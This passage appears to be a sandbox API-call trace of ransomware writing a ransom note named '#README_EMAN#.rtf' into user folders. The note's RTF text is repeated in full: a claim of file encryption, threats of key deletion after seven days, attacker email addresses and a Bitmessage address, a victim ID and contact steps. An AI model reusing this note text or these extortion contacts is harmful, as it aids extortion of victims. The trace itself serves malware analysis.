recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.189] WriteFile (in: hFile=0x2d4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.190] CloseHandle (hObject=0x2d4) returned 1 [0289.190] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\#readme_eman#.rtf")) returned 0xffffffff [0289.190] GetLastError () returned 0x2 [0289.190] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\zu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 